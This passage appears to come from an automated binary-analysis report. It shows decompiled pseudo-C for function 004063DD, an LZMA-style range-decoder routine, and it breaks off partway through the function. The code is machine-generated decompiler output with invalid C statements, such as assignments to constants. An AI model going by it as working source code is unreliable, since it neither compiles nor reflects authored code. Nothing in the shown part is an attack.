                                                                                                                          Function 004063DD, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 99%
                                                                                                                          			E004063DD() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M0040684B))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8)); // executed
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
